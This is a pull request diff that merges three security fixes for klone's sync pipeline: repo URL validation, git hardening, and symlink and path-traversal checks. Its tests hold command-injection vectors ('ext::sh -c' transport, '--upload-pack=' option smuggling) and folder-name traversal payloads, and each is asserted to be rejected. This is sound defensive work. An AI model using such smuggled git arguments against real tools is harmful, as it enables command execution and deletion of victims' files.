### PR TITLE
combine 3 vuln fixes

### DIFF
--- a/pkg/download/git/clone.go
+++ b/pkg/download/git/clone.go
@@ -32,6 +32,10 @@ import (
 )
 
 func Get(ctx context.Context, targetPath string, src mod.KloneSource) (string, error) {
+	if err := mod.ValidateRepoURL(src.RepoURL); err != nil {
+		return "", err
+	}
+
 	fmt.Fprintf(os.Stdout, "Cloning %s from %s to %s on commit %s\n", src.RepoPath, src.RepoURL, targetPath, src.RepoHash)
 
 	if err := sparseCheckout(ctx, targetPath, src.RepoURL, src.RepoHash, []string{src.RepoPath}); err != nil {

--- a/pkg/download/git/clone.go
+++ b/pkg/download/git/clone.go
@@ -44,11 +44,15 @@ func Get(ctx context.Context, targetPath string, src mod.KloneSource) (string, e
 const gitRetryDelay = 5 * time.Second
 
 func runGitCmd(ctx context.Context, root string, stdout io.Writer, stderr io.Writer, args ...string) error {
+	hardened := append([]string{
+		"-c", "protocol.ext.allow=never",
+	}, args...)
+
 	do := func() (struct{}, error) {
 		// dummy return value to match the interface of backoff.Operation
 		ret := struct{}{}
 
-		cmd := exec.CommandContext(ctx, "git", args...)
+		cmd := exec.CommandContext(ctx, "git", hardened...)
 
 		cmd.Dir = root
 		cmd.Env = append(os.Environ(), cmd.Env...)
@@ -101,7 +105,7 @@ func sparseCheckout(ctx context.Context, root string, repoURL string, branch str
 		return err
 	}
 
-	if err := runGitCmd(ctx, root, os.Stdout, os.Stderr, "clone", "--depth=1", "--filter=blob:none", "--no-checkout", repoURL, "."); err != nil {
+	if err := runGitCmd(ctx, root, os.Stdout, os.Stderr, "clone", "--depth=1", "--filter=blob:none", "--no-checkout", "--", repoURL, "."); err != nil {
 		return err
 	}
 

--- a/pkg/download/git/hash.go
+++ b/pkg/download/git/hash.go
@@ -21,9 +21,15 @@ import (
 	"context"
 	"fmt"
 	"os"
+
+	"github.com/cert-manager/klone/pkg/mod"
 )
 
 func GetHash(ctx context.Context, repoURL string, ref string) (string, error) {
+	if err := mod.ValidateRepoURL(repoURL); err != nil {
+		return "", err
+	}
+
 	outBuffer := &bytes.Buffer{}
 	if err := runGitCmd(ctx, ".", outBuffer, os.Stderr, "ls-remote", "--", repoURL, ref); err != nil {
 		return "", err

--- a/pkg/download/git/hash.go
+++ b/pkg/download/git/hash.go
@@ -25,7 +25,7 @@ import (
 
 func GetHash(ctx context.Context, repoURL string, ref string) (string, error) {
 	outBuffer := &bytes.Buffer{}
-	if err := runGitCmd(ctx, ".", outBuffer, os.Stderr, "ls-remote", repoURL, ref); err != nil {
+	if err := runGitCmd(ctx, ".", outBuffer, os.Stderr, "ls-remote", "--", repoURL, ref); err != nil {
 		return "", err
 	}
 

--- a/pkg/mod/index.go
+++ b/pkg/mod/index.go
@@ -18,6 +18,7 @@ package mod
 
 import (
 	"bufio"
+	"fmt"
 	"io"
 	"path/filepath"
 	"slices"
@@ -197,6 +198,35 @@ func (w WorkDir) AddTarget(target string, folderName string, dep KloneSource) er
 
 func cleanRelativePath(src string) string {
 	return filepath.Join(".", filepath.Clean(filepath.Join("/", src)))
+}
+
+// ValidateRepoURL rejects repo_url values that could be re-interpreted by git
+// as a command-line option or as a helper transport (e.g. ext::sh -c …).
+func ValidateRepoURL(repoURL string) error {
+	if repoURL == "" {
+		return fmt.Errorf("repo_url is empty")
+	}
+	if strings.HasPrefix(repoURL, "-") {
+		return fmt.Errorf("repo_url %q starts with '-', refusing to pass it to git", repoURL)
+	}
+	if strings.Contains(repoURL, "::") {
+		return fmt.Errorf("repo_url %q uses a helper transport ('::'), which is not allowed", repoURL)
+	}
+	switch {
+	case strings.HasPrefix(repoURL, "https://"),
+		strings.HasPrefix(repoURL, "http://"),
+		strings.HasPrefix(repoURL, "ssh://"),
+		strings.HasPrefix(repoURL, "git://"),
+		strings.HasPrefix(repoURL, "file://"),
+		strings.HasPrefix(repoURL, "/"):
+		return nil
+	}
+	if at := strings.Index(repoURL, "@"); at > 0 {
+		if colon := strings.Index(repoURL, ":"); colon > at {
+			return nil
+		}
+	}
+	return fmt.Errorf("repo_url %q does not use an allowed scheme (https/http/ssh/git/file/local path/scp-like)", repoURL)
 }
 
 func (w WorkDir) FetchTargets(

--- a/pkg/mod/index_test.go
+++ b/pkg/mod/index_test.go
@@ -20,8 +20,58 @@ import (
 	"os"
 	"path"
 	"slices"
+	"strings"
 	"testing"
 )
+
+func TestValidateRepoURL(t *testing.T) {
+	tests := []struct {
+		name     string
+		input    string
+		wantErr  bool
+		errMatch string // substring expected in the error, optional
+	}{
+		// Legitimate.
+		{name: "https", input: "https://github.com/cert-manager/klone.git", wantErr: false},
+		{name: "http", input: "http://example.com/repo.git", wantErr: false},
+		{name: "ssh url", input: "ssh://git@github.com/cert-manager/klone.git", wantErr: false},
+		{name: "git url", input: "git://example.com/repo.git", wantErr: false},
+		{name: "file url", input: "file:///srv/git/repo.git", wantErr: false},
+		{name: "absolute local path", input: "/srv/git/repo.git", wantErr: false},
+		{name: "scp-like", input: "git@github.com:cert-manager/klone.git", wantErr: false},
+
+		// VC-53817 vectors.
+		{name: "ext transport", input: "ext::sh -c touch$IFS/tmp/klone-pwned", wantErr: true, errMatch: "helper transport"},
+		{name: "upload-pack option", input: "--upload-pack=touch /tmp/klone-pwned2;true", wantErr: true, errMatch: "starts with '-'"},
+		{name: "single dash option", input: "-uX", wantErr: true, errMatch: "starts with '-'"},
+		{name: "transport_helper", input: "transport_helper::cmd", wantErr: true, errMatch: "helper transport"},
+
+		// Degenerate / unsupported.
+		{name: "empty", input: "", wantErr: true},
+		{name: "relative path", input: "../etc", wantErr: true},
+		{name: "bare hostname", input: "example.com", wantErr: true},
+		{name: "scheme without slashes", input: "javascript:alert(1)", wantErr: true},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			err := ValidateRepoURL(tt.input)
+			if tt.wantErr {
+				if err == nil {
+					t.Errorf("ValidateRepoURL(%q) = nil, want error", tt.input)
+					return
+				}
+				if tt.errMatch != "" && !strings.Contains(err.Error(), tt.errMatch) {
+					t.Errorf("ValidateRepoURL(%q) error = %q, want substring %q", tt.input, err.Error(), tt.errMatch)
+				}
+				return
+			}
+			if err != nil {
+				t.Errorf("ValidateRepoURL(%q) returned unexpected error: %v", tt.input, err)
+			}
+		})
+	}
+}
 
 func TestKloneItemSorting(t *testing.T) {
 	// Create some sample KloneItems

--- a/pkg/sync/sync.go
+++ b/pkg/sync/sync.go
@@ -21,6 +21,7 @@ import (
 	"fmt"
 	"os"
 	"path/filepath"
+	"strings"
 
 	"github.com/cert-manager/klone/pkg/cache"
 	"github.com/cert-manager/klone/pkg/download/git"
@@ -28,9 +29,23 @@ import (
 )
 
 func SyncFolder(ctx context.Context, workDirPath string, forceUpgrade bool) error {
+	// assertNoSymlinkInTree treats workDirPath as a trusted root and does
+	// not inspect it. Resolve symlinks once up-front so a caller invoking
+	// klone from inside a symlinked path cannot shift the trust boundary
+	// above the intended directory (VC-53816).
+	resolved, err := filepath.EvalSymlinks(workDirPath)
+	if err != nil {
+		return fmt.Errorf("failed to resolve workDir %q: %w", workDirPath, err)
+	}
+	workDirPath = resolved
+
 	workDir := mod.WorkDir(workDirPath)
 	if err := workDir.FetchTargets(
 		func(_ string, _ string, src *mod.KloneSource) error {
+			if err := mod.ValidateRepoURL(src.RepoURL); err != nil {
+				return err
+			}
+
 			src.RepoPath = filepath.Join(".", filepath.Clean(filepath.Join("/", src.RepoPath)))
 
 			if src.RepoHash == "" || forceUpgrade {
@@ -45,23 +60,43 @@ func SyncFolder(ctx context.Context, workDirPath string, forceUpgrade bool) erro
 			return nil
 		},
 		func(target string, srcs mod.KloneFolder) error {
-			folders := newTreeNode()
-			for _, src := range srcs {
-				folders.Add(filepath.SplitList(src.FolderName)...)
+			targetSegments, err := splitTargetName(target)
+			if err != nil {
+				return err
 			}
 
-			if err := os.MkdirAll(filepath.Join(workDirPath, target), 0755); err != nil {
+			parsedSegments := make([][]string, len(srcs))
+			folders := newTreeNode()
+			for i, src := range srcs {
+				segments, err := splitFolderName(src.FolderName)
+				if err != nil {
+					return err
+				}
+				parsedSegments[i] = segments
+				folders.Add(segments...)
+			}
+
+			// Check the target even when srcs is empty; Cleanup still runs.
+			if err := assertNoSymlinkInTree(workDirPath, targetSegments); err != nil {
+				return err
+			}
+			targetRoot := filepath.Join(append([]string{workDirPath}, targetSegments...)...)
+			if err := os.MkdirAll(targetRoot, 0755); err != nil {
 				return err
 			}
 
 			// 1) Remove all folders that are not defined in srcs
-			if err := folders.Cleanup(filepath.Join(workDirPath, target)); err != nil {
+			if err := folders.Cleanup(targetRoot); err != nil {
 				return err
 			}
 
 			// 2) Sync all folders with cached files
-			for _, src := range srcs {
-				if err := cache.CloneWithCache(ctx, filepath.Join(workDirPath, target, src.FolderName), src.KloneSource, git.Get); err != nil {
+			for i, src := range srcs {
+				if err := assertNoSymlinkInTree(targetRoot, parsedSegments[i]); err != nil {
+					return err
+				}
+				dest := filepath.Join(append([]string{targetRoot}, parsedSegments[i]...)...)
+				if err := cache.CloneWithCache(ctx, dest, src.KloneSource, git.Get); err != nil {
 					return err
 				}
 			}
@@ -78,6 +113,63 @@ func SyncFolder(ctx context.Context, workDirPath string, forceUpgrade bool) erro
 
 	return nil
 
+}
+
+func splitFolderName(folderName string) ([]string, error) {
+	return splitManifestPath("folder_name", folderName)
+}
+
+func splitTargetName(targetName string) ([]string, error) {
+	return splitManifestPath("target", targetName)
+}
+
+// splitManifestPath parses manifest-controlled paths consistently across OSes.
+func splitManifestPath(fieldName, value string) ([]string, error) {
+	if value == "" {
+		return nil, fmt.Errorf("invalid %s %q: empty", fieldName, value)
+	}
+	if hasWindowsDrivePrefix(value) {
+		return nil, fmt.Errorf("invalid %s %q: Windows volume prefix is not allowed", fieldName, value)
+	}
+	if filepath.IsAbs(value) || filepath.VolumeName(value) != "" {
+		return nil, fmt.Errorf("invalid %s %q: absolute paths and volume prefixes are not allowed", fieldName, value)
+	}
+	normalised := strings.ReplaceAll(value, `\`, "/")
+	segments := strings.Split(normalised, "/")
+	for _, seg := range segments {
+		if seg == "" || seg == "." || seg == ".." {
+			return nil, fmt.Errorf("invalid %s %q: empty or traversal segment %q", fieldName, value, seg)
+		}
+	}
+	return segments, nil
+}
+
+// assertNoSymlinkInTree rejects existing symlinks along a destination path.
+func assertNoSymlinkInTree(root string, segments []string) error {
+	cur := root
+	for _, seg := range segments {
+		cur = filepath.Join(cur, seg)
+		info, err := os.Lstat(cur)
+		if err != nil {
+			if os.IsNotExist(err) {
+				return nil
+			}
+			return err
+		}
+		if info.Mode()&os.ModeSymlink != 0 {
+			return fmt.Errorf("refusing to traverse symlink at %q (VC-53818)", cur)
+		}
+	}
+	return nil
+}
+
+// hasWindowsDrivePrefix catches drive-qualified paths on every GOOS.
+func hasWindowsDrivePrefix(s string) bool {
+	if len(s) < 2 || s[1] != ':' {
+		return false
+	}
+	c := s[0]
+	return (c >= 'A' && c <= 'Z') || (c >= 'a' && c <= 'z')
 }
 
 type treeNode struct {
@@ -110,8 +202,20 @@ func (tn treeNode) Cleanup(root string) error {
 		return nil
 	}
 
+	if info, err := os.Lstat(root); err != nil {
+		if os.IsNotExist(err) {
+			return nil
+		}
+		return err
+	} else if info.Mode()&os.ModeSymlink != 0 {
+		return fmt.Errorf("treeNode.Cleanup: refusing to operate on symlinked root %q (VC-53818)", root)
+	}
+
 	entries, err := os.ReadDir(root)
 	if err != nil {
+		if os.IsNotExist(err) {
+			return nil
+		}
 		return err
 	}
 
@@ -127,6 +231,9 @@ func (tn treeNode) Cleanup(root string) error {
 	}
 
 	for name, node := range tn.children {
+		if name == "" || name == "." || name == ".." {
+			return fmt.Errorf("treeNode.Cleanup: refusing to descend into unsafe child name %q", name)
+		}
 		if err := node.Cleanup(filepath.Join(root, name)); err != nil {
 			return err
 		}

--- a/pkg/sync/sync.go
+++ b/pkg/sync/sync.go
@@ -42,10 +42,6 @@ func SyncFolder(ctx context.Context, workDirPath string, forceUpgrade bool) erro
 	workDir := mod.WorkDir(workDirPath)
 	if err := workDir.FetchTargets(
 		func(_ string, _ string, src *mod.KloneSource) error {
-			if err := mod.ValidateRepoURL(src.RepoURL); err != nil {
-				return err
-			}
-
 			src.RepoPath = filepath.Join(".", filepath.Clean(filepath.Join("/", src.RepoPath)))
 
 			if src.RepoHash == "" || forceUpgrade {

--- a/pkg/sync/sync_test.go
+++ b/pkg/sync/sync_test.go
@@ -1,0 +1,482 @@
+/*
+Copyright 2026 The cert-manager Authors.
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+    http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+*/
+
+package sync
+
+import (
+	"os"
+	"os/exec"
+	"path/filepath"
+	"slices"
+	"strings"
+	"testing"
+)
+
+func TestSplitFolderName(t *testing.T) {
+	tests := []struct {
+		name    string
+		input   string
+		want    []string
+		wantErr bool
+	}{
+		{name: "single segment", input: "a", want: []string{"a"}, wantErr: false},
+		{name: "nested", input: "a/b", want: []string{"a", "b"}, wantErr: false},
+		{name: "deeply nested", input: "a/b/c/d", want: []string{"a", "b", "c", "d"}, wantErr: false},
+
+		// Backslashes are treated as separators on every GOOS.
+		{name: "backslash separator", input: `a\b`, want: []string{"a", "b"}, wantErr: false},
+		{name: "mixed separators", input: `a\b/c`, want: []string{"a", "b", "c"}, wantErr: false},
+
+		// VC-53818 payloads are now literal names, not path-list entries.
+		{name: "colon payload kept as literal", input: "..:..:..", want: []string{"..:..:.."}, wantErr: false},
+		{name: "semicolon payload kept as literal", input: "..;..;..", want: []string{"..;..;.."}, wantErr: false},
+
+		{name: "leading traversal", input: "../etc", wantErr: true},
+		{name: "embedded traversal", input: "a/../b", wantErr: true},
+		{name: "trailing traversal", input: "a/..", wantErr: true},
+		{name: "current dir", input: "./a", wantErr: true},
+		{name: "lone dot", input: ".", wantErr: true},
+		{name: "lone dotdot", input: "..", wantErr: true},
+
+		{name: "empty input", input: "", wantErr: true},
+		{name: "leading slash", input: "/a", wantErr: true},
+		{name: "trailing slash", input: "a/", wantErr: true},
+		{name: "double slash", input: "a//b", wantErr: true},
+
+		// Absolute and drive-qualified paths have no use in folder_name.
+		{name: "windows absolute backslash", input: `C:\tmp`, wantErr: true},
+		{name: "windows absolute forward", input: "C:/tmp", wantErr: true},
+		{name: "windows volume only", input: "C:", wantErr: true},
+		{name: "unc path", input: `\\server\share\x`, wantErr: true},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			got, err := splitFolderName(tt.input)
+			if tt.wantErr {
+				if err == nil {
+					t.Errorf("splitFolderName(%q) = %v, want error", tt.input, got)
+				}
+				return
+			}
+			if err != nil {
+				t.Errorf("splitFolderName(%q) returned unexpected error: %v", tt.input, err)
+				return
+			}
+			if !slices.Equal(got, tt.want) {
+				t.Errorf("splitFolderName(%q) = %v, want %v", tt.input, got, tt.want)
+			}
+		})
+	}
+}
+
+// TestSyncFolder_ColonPayloadDoesNotEscape is the end-to-end VC-53818 check.
+func TestSyncFolder_ColonPayloadDoesNotEscape(t *testing.T) {
+	sb := t.TempDir()
+	victim := filepath.Join(sb, "buffer", "L3", "L2", "L1", "victim")
+	if err := os.MkdirAll(victim, 0o755); err != nil {
+		t.Fatalf("setup: %v", err)
+	}
+
+	mustTouch(t, filepath.Join(sb, "buffer", "L3", "L2", "L1", "SENTINEL-L1"))
+	mustTouch(t, filepath.Join(sb, "buffer", "L3", "L2", "SENTINEL-L2"))
+	mustTouch(t, filepath.Join(sb, "buffer", "L3", "SENTINEL-L3"))
+
+	manifest := `targets:
+  vendored:
+    - folder_name: "..:..:.."
+      repo_url: /nonexistent-klone-poc-repo
+      repo_ref: main
+      repo_hash: deadbeefdeadbeefdeadbeefdeadbeefdeadbeef
+      repo_path: .
+`
+	if err := os.WriteFile(filepath.Join(victim, "klone.yaml"), []byte(manifest), 0o644); err != nil {
+		t.Fatalf("write manifest: %v", err)
+	}
+
+	t.Setenv("KLONE_CACHE_DIR", filepath.Join(sb, "cache"))
+	_ = SyncFolder(t.Context(), victim, false)
+
+	for _, p := range []string{
+		filepath.Join(sb, "buffer", "L3", "L2", "L1", "SENTINEL-L1"),
+		filepath.Join(sb, "buffer", "L3", "L2", "SENTINEL-L2"),
+		filepath.Join(sb, "buffer", "L3", "SENTINEL-L3"),
+	} {
+		if _, err := os.Stat(p); err != nil {
+			t.Errorf("VC-53818 escape: sentinel %s was wrongfully removed: %v", p, err)
+		}
+	}
+}
+
+// Nested folder names should sync idempotently with either slash style.
+func TestSyncFolder_NestedFolderNameSyncs(t *testing.T) {
+	if _, err := exec.LookPath("git"); err != nil {
+		t.Skip("git not on PATH")
+	}
+	if _, err := exec.LookPath("rsync"); err != nil {
+		t.Skip("rsync not on PATH")
+	}
+
+	cases := []struct {
+		name       string
+		folderName string
+	}{
+		{name: "forward slashes", folderName: "deeply/nested/path"},
+		{name: "backslash separator", folderName: `deeply\nested\path`},
+		{name: "mixed separators", folderName: `deeply\nested/path`},
+	}
+
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			sb := t.TempDir()
+			srv := filepath.Join(sb, "srv", "repo.git")
+			work := filepath.Join(sb, "repo-work")
+			project := filepath.Join(sb, "project")
+			cache := filepath.Join(sb, "cache")
+			for _, d := range []string{filepath.Dir(srv), work, project, cache} {
+				if err := os.MkdirAll(d, 0o755); err != nil {
+					t.Fatalf("mkdir %s: %v", d, err)
+				}
+			}
+
+			runGit := func(dir string, args ...string) {
+				t.Helper()
+				cmd := exec.Command("git", args...)
+				cmd.Dir = dir
+				cmd.Env = append(os.Environ(),
+					"GIT_AUTHOR_NAME=t", "GIT_AUTHOR_EMAIL=t@t",
+					"GIT_COMMITTER_NAME=t", "GIT_COMMITTER_EMAIL=t@t",
+				)
+				if out, err := cmd.CombinedOutput(); err != nil {
+					t.Fatalf("git %v: %v\n%s", args, err, out)
+				}
+			}
+
+			runGit(filepath.Dir(srv), "init", "-q", "--bare", srv)
+			runGit(work, "init", "-q")
+			if err := os.WriteFile(filepath.Join(work, "f.txt"), []byte("hello"), 0o644); err != nil {
+				t.Fatalf("write f.txt: %v", err)
+			}
+			runGit(work, "add", ".")
+			runGit(work, "commit", "-qm", "a")
+			runGit(work, "push", "-q", srv, "HEAD:main")
+
+			hashOut, err := exec.Command("git", "-C", work, "rev-parse", "HEAD").Output()
+			if err != nil {
+				t.Fatalf("rev-parse: %v", err)
+			}
+			hash := strings.TrimSpace(string(hashOut))
+
+			manifest := "targets:\n" +
+				"  vendored:\n" +
+				"    - folder_name: " + tc.folderName + "\n" +
+				"      repo_url: " + srv + "\n" +
+				"      repo_ref: main\n" +
+				"      repo_hash: " + hash + "\n" +
+				"      repo_path: .\n"
+			if err := os.WriteFile(filepath.Join(project, "klone.yaml"), []byte(manifest), 0o644); err != nil {
+				t.Fatalf("write manifest: %v", err)
+			}
+
+			t.Setenv("KLONE_CACHE_DIR", cache)
+
+			if err := SyncFolder(t.Context(), project, false); err != nil {
+				t.Fatalf("first SyncFolder failed for folder_name %q: %v", tc.folderName, err)
+			}
+			nested := filepath.Join(project, "vendored", "deeply", "nested", "path", "f.txt")
+			if got, err := os.ReadFile(nested); err != nil {
+				t.Fatalf("first sync: nested path not materialised: %v", err)
+			} else if string(got) != "hello" {
+				t.Errorf("first sync content = %q, want %q", got, "hello")
+			}
+
+			if err := SyncFolder(t.Context(), project, false); err != nil {
+				t.Fatalf("second SyncFolder failed for folder_name %q: %v", tc.folderName, err)
+			}
+			if got, err := os.ReadFile(nested); err != nil {
+				t.Fatalf("second sync: nested path was removed (cleanup/sync disagreed): %v", err)
+			} else if string(got) != "hello" {
+				t.Errorf("second sync content = %q, want %q", got, "hello")
+			}
+		})
+	}
+}
+
+// Cleanup should reject unsafe children even if callers bypass parsing.
+func TestTreeNodeCleanup_BoundedToRoot(t *testing.T) {
+	for _, name := range []string{"..", ".", ""} {
+		t.Run("child_"+name, func(t *testing.T) {
+			tn := newTreeNode()
+			tn.children[name] = newTreeNode()
+			tn.children[name].isLeaf = true
+
+			root := t.TempDir()
+			parent := filepath.Dir(root)
+			sentinel := filepath.Join(parent, "SENTINEL-CLEANUP-BOUNDED")
+			if err := os.WriteFile(sentinel, []byte("x"), 0o644); err != nil {
+				t.Fatalf("plant sentinel: %v", err)
+			}
+			t.Cleanup(func() { _ = os.Remove(sentinel) })
+
+			err := tn.Cleanup(root)
+			if err == nil {
+				t.Fatalf("Cleanup with child %q returned nil, want refusal error", name)
+			}
+			if !strings.Contains(err.Error(), "unsafe child name") {
+				t.Errorf("Cleanup error = %q, want substring 'unsafe child name'", err.Error())
+			}
+			if _, statErr := os.Stat(sentinel); statErr != nil {
+				t.Errorf("sentinel outside root was wrongfully removed: %v", statErr)
+			}
+		})
+	}
+}
+
+func skipIfNoSymlinks(t *testing.T) {
+	t.Helper()
+	probe := t.TempDir()
+	if err := os.Symlink(probe, filepath.Join(probe, "probe")); err != nil {
+		t.Skipf("skip: symlinks unsupported in this environment: %v", err)
+	}
+}
+
+func TestTreeNodeCleanup_RefusesSymlinkDescent(t *testing.T) {
+	skipIfNoSymlinks(t)
+
+	sb := t.TempDir()
+	outside := filepath.Join(sb, "outside")
+	if err := os.MkdirAll(outside, 0o755); err != nil {
+		t.Fatalf("mkdir outside: %v", err)
+	}
+	sentinel := filepath.Join(outside, "SENTINEL")
+	if err := os.WriteFile(sentinel, []byte("VICTIM"), 0o644); err != nil {
+		t.Fatalf("plant sentinel: %v", err)
+	}
+
+	root := filepath.Join(sb, "root")
+	if err := os.MkdirAll(root, 0o755); err != nil {
+		t.Fatalf("mkdir root: %v", err)
+	}
+	if err := os.Symlink(outside, filepath.Join(root, "deeply")); err != nil {
+		t.Fatalf("plant symlink: %v", err)
+	}
+
+	tn := newTreeNode()
+	tn.Add("deeply", "nested", "path")
+
+	err := tn.Cleanup(root)
+	if err == nil {
+		t.Fatalf("Cleanup returned nil, want symlink-refusal error")
+	}
+	if !strings.Contains(err.Error(), "symlink") {
+		t.Errorf("Cleanup error = %q, want substring 'symlink'", err.Error())
+	}
+	if _, statErr := os.Stat(sentinel); statErr != nil {
+		t.Errorf("VC-53818 symlink escape: sentinel outside root was removed: %v", statErr)
+	}
+}
+
+// Expected intermediate directories must not be symlinks.
+func TestSyncFolder_IntermediateSymlinkRejected(t *testing.T) {
+	skipIfNoSymlinks(t)
+
+	sb := t.TempDir()
+	outside := filepath.Join(sb, "outside")
+	if err := os.MkdirAll(outside, 0o755); err != nil {
+		t.Fatalf("mkdir outside: %v", err)
+	}
+	sentinel := filepath.Join(outside, "SENTINEL")
+	if err := os.WriteFile(sentinel, []byte("VICTIM"), 0o644); err != nil {
+		t.Fatalf("plant sentinel: %v", err)
+	}
+
+	project := filepath.Join(sb, "project")
+	if err := os.MkdirAll(filepath.Join(project, "vendored"), 0o755); err != nil {
+		t.Fatalf("mkdir project/vendored: %v", err)
+	}
+	if err := os.Symlink(outside, filepath.Join(project, "vendored", "deeply")); err != nil {
+		t.Fatalf("plant symlink: %v", err)
+	}
+
+	manifest := `targets:
+  vendored:
+    - folder_name: deeply/nested/path
+      repo_url: /nonexistent-klone-poc-repo
+      repo_ref: main
+      repo_hash: deadbeefdeadbeefdeadbeefdeadbeefdeadbeef
+      repo_path: .
+`
+	if err := os.WriteFile(filepath.Join(project, "klone.yaml"), []byte(manifest), 0o644); err != nil {
+		t.Fatalf("write manifest: %v", err)
+	}
+
+	t.Setenv("KLONE_CACHE_DIR", filepath.Join(sb, "cache"))
+	err := SyncFolder(t.Context(), project, false)
+	if err == nil {
+		t.Fatalf("SyncFolder returned nil, want symlink-refusal error")
+	}
+	if !strings.Contains(err.Error(), "symlink") {
+		t.Errorf("SyncFolder error = %q, want substring 'symlink'", err.Error())
+	}
+	if _, statErr := os.Stat(sentinel); statErr != nil {
+		t.Errorf("VC-53818 escape: sentinel outside project was removed: %v", statErr)
+	}
+}
+
+// Empty targets still run cleanup, so the target path must be checked.
+func TestSyncFolder_EmptySrcsTargetSymlinkRejected(t *testing.T) {
+	skipIfNoSymlinks(t)
+
+	sb := t.TempDir()
+	outside := filepath.Join(sb, "outside")
+	if err := os.MkdirAll(outside, 0o755); err != nil {
+		t.Fatalf("mkdir outside: %v", err)
+	}
+	sentinel := filepath.Join(outside, "SENTINEL")
+	if err := os.WriteFile(sentinel, []byte("VICTIM"), 0o644); err != nil {
+		t.Fatalf("plant sentinel: %v", err)
+	}
+
+	project := filepath.Join(sb, "project")
+	if err := os.MkdirAll(project, 0o755); err != nil {
+		t.Fatalf("mkdir project: %v", err)
+	}
+	if err := os.Symlink(outside, filepath.Join(project, "vendored")); err != nil {
+		t.Fatalf("plant symlink: %v", err)
+	}
+
+	manifest := `targets:
+  vendored: []
+`
+	if err := os.WriteFile(filepath.Join(project, "klone.yaml"), []byte(manifest), 0o644); err != nil {
+		t.Fatalf("write manifest: %v", err)
+	}
+
+	t.Setenv("KLONE_CACHE_DIR", filepath.Join(sb, "cache"))
+	err := SyncFolder(t.Context(), project, false)
+	if err == nil {
+		t.Fatalf("SyncFolder returned nil, want symlink-refusal error")
+	}
+	if !strings.Contains(err.Error(), "symlink") {
+		t.Errorf("SyncFolder error = %q, want substring 'symlink'", err.Error())
+	}
+	if _, statErr := os.Stat(sentinel); statErr != nil {
+		t.Errorf("VC-53818 empty-srcs escape: sentinel was removed: %v", statErr)
+	}
+}
+
+// Target paths need component-wise symlink checks too.
+func TestSyncFolder_NestedTargetSymlinkRejected(t *testing.T) {
+	skipIfNoSymlinks(t)
+
+	sb := t.TempDir()
+	outside := filepath.Join(sb, "outside")
+	if err := os.MkdirAll(filepath.Join(outside, "bar"), 0o755); err != nil {
+		t.Fatalf("mkdir outside/bar: %v", err)
+	}
+	sentinel := filepath.Join(outside, "bar", "SENTINEL")
+	if err := os.WriteFile(sentinel, []byte("VICTIM"), 0o644); err != nil {
+		t.Fatalf("plant sentinel: %v", err)
+	}
+
+	project := filepath.Join(sb, "project")
+	if err := os.MkdirAll(project, 0o755); err != nil {
+		t.Fatalf("mkdir project: %v", err)
+	}
+	if err := os.Symlink(outside, filepath.Join(project, "foo")); err != nil {
+		t.Fatalf("plant symlink: %v", err)
+	}
+
+	manifest := `targets:
+  foo/bar: []
+`
+	if err := os.WriteFile(filepath.Join(project, "klone.yaml"), []byte(manifest), 0o644); err != nil {
+		t.Fatalf("write manifest: %v", err)
+	}
+
+	t.Setenv("KLONE_CACHE_DIR", filepath.Join(sb, "cache"))
+	err := SyncFolder(t.Context(), project, false)
+	if err == nil {
+		t.Fatalf("SyncFolder returned nil, want symlink-refusal error")
+	}
+	if !strings.Contains(err.Error(), "symlink") {
+		t.Errorf("SyncFolder error = %q, want substring 'symlink'", err.Error())
+	}
+	if _, statErr := os.Stat(sentinel); statErr != nil {
+		t.Errorf("VC-53818 nested-target escape: sentinel was removed: %v", statErr)
+	}
+}
+
+// The top-level target directory itself must not be a symlink.
+func TestSyncFolder_TargetSymlinkRejected(t *testing.T) {
+	skipIfNoSymlinks(t)
+
+	sb := t.TempDir()
+	outside := filepath.Join(sb, "outside")
+	if err := os.MkdirAll(outside, 0o755); err != nil {
+		t.Fatalf("mkdir outside: %v", err)
+	}
+	sentinel := filepath.Join(outside, "SENTINEL")
+	if err := os.WriteFile(sentinel, []byte("VICTIM"), 0o644); err != nil {
+		t.Fatalf("plant sentinel: %v", err)
+	}
+
+	project := filepath.Join(sb, "project")
+	if err := os.MkdirAll(project, 0o755); err != nil {
+		t.Fatalf("mkdir project: %v", err)
+	}
+	if err := os.Symlink(outside, filepath.Join(project, "vendored")); err != nil {
+		t.Fatalf("plant symlink: %v", err)
+	}
+
+	manifest := `targets:
+  vendored:
+    - folder_name: subdir
+      repo_url: /nonexistent-klone-poc-repo
+      repo_ref: main
+      repo_hash: deadbeefdeadbeefdeadbeefdeadbeefdeadbeef
+      repo_path: .
+`
+	if err := os.WriteFile(filepath.Join(project, "klone.yaml"), []byte(manifest), 0o644); err != nil {
+		t.Fatalf("write manifest: %v", err)
+	}
+
+	t.Setenv("KLONE_CACHE_DIR", filepath.Join(sb, "cache"))
+	err := SyncFolder(t.Context(), project, false)
+	if err == nil {
+		t.Fatalf("SyncFolder returned nil, want symlink-refusal error")
+	}
+	if !strings.Contains(err.Error(), "symlink") {
+		t.Errorf("SyncFolder error = %q, want substring 'symlink'", err.Error())
+	}
+	if _, statErr := os.Stat(sentinel); statErr != nil {
+		t.Errorf("VC-53818 root-symlink escape: sentinel was removed: %v", statErr)
+	}
+}
+
+func mustTouch(t *testing.T, p string) {
+	t.Helper()
+	if err := os.MkdirAll(filepath.Dir(p), 0o755); err != nil {
+		t.Fatalf("mkdir for %s: %v", p, err)
+	}
+	f, err := os.Create(p)
+	if err != nil {
+		t.Fatalf("touch %s: %v", p, err)
+	}
+	if err := f.Close(); err != nil {
+		t.Fatalf("close %s: %v", p, err)
+	}
+}


### PR DESCRIPTION
# klone — consolidated fixes for VC-53816, VC-53817, VC-53818

**Branch:** `CVE-fixes` (cert-manager/klone).

Three independently-reported vulnerabilities in klone's `SyncFolder`
pipeline, all triggered by a manifest the victim runs `klone sync`
against. Each was developed as its own branch (`VC-53816`, `VC-53817`,
`VC-53818`) with its own PR description; this branch is the union of
those three so they can be released, tagged, and pulled into cert-manager
in one bump of `make/_shared/tools/00_mod.mk`.

| ID        | CWE                | Impact                                                                 | Branch / PR                                  |
